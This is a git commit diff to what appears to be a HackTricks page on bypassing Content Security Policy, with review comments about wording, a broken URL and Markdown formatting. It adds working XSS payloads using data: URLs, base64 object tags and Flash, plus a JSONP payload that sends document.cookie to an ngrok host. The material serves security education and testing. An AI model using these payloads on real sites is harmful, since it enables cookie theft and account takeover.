GitBook: [#3634] No subject

This commit is contained in:
CPol 2022-10-28 08:59:49 +00:00 committed by gitbook-bot
parent 69ae5653b7
commit 542406d1b2
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed file with 16 additions and 2 deletions


@ -128,6 +128,18 @@ Working payload:
"/>'><script src=data:text/javascript,alert(1337)></script>
```
### Whitelisted data:
```yaml
Content-Security-Policy: script-src data: ;
```
Working payload:
```html
<script src=data:text/javascript,alert(1337)></script>
```
### Lack of object-src and default-src
{% hint style="danger" %}
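Review bot: the new `### Whitelisted data:` section gives the header and the payload but never says why the bypass works; add one sentence stating that allowing the `data:` scheme in `script-src` lets a page load arbitrary script from a `data:` URL, so the policy provides no script restriction at all, and that the fix is to drop `data:` from `script-src` (use nonces or hashes if inline scripts are needed). Also drop the trailing colon in the heading so it matches `### Lack of object-src and default-src` directly below it.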
@ -142,7 +154,7 @@ Working payloads:
```markup
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
">'><object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
```
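Review bot: the corrected line removes the space in `https: //ajax.googleapis.com`, but the same URL still contains `2.8.0 r4` with a space inside the path segment, which looks like the same kind of damage; a raw space in a URL path gets percent-encoded by the browser and is unlikely to be the intended path, so check it against the real YUI path before merging. It is also worth a short caveat next to these two `application/x-shockwave-flash` payloads that they depend on Flash Player, which current browsers no longer ship, so they are of historical interest rather than something to expect to work today.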
@ -206,9 +218,10 @@ Scenarios like this where `script-src` is set to `self` and a particular domain
```markup
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
"><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)"></script>
```
[JSONBee](https://github.com/zigoo0/JSONBee) contains ready to use JSONP endpoints to CSP bypass of different websites.
****[**JSONBee**](https://github.com/zigoo0/JSONBee) **** contains **ready to use JSONP endpoints** to CSP bypass of different websites.
The same vulnerability will occur if the **trusted endpoint contains an Open Redirect** because if the initial endpoint is trusted, redirects are trusted.
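Review bot: the rewritten JSONBee line wraps the link in `****`, which Markdown renders as empty strong markers or literal asterisks rather than bold; use `**[JSONBee](https://github.com/zigoo0/JSONBee)**` instead. While touching the line, "ready to use JSONP endpoints to CSP bypass of different websites" reads better as "ready-to-use JSONP endpoints for bypassing the CSP of different websites".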
@ -525,6 +538,7 @@ Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y
* [https://lcamtuf.coredump.cx/postxss/](https://lcamtuf.coredump.cx/postxss/)
* [https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d](https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)
* [https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme](https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme)
* [https://www.cobalt.io/blog/csp-and-bypasses](https://www.cobalt.io/blog/csp-and-bypasses)
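Review bot: the added 0xn3va reference ends in `#allowed-data-scheme`, which is the source for the new `Whitelisted data:` section earlier in this commit; consider also linking it inline from that section so the attribution sits next to the technique rather than only in the list at the bottom.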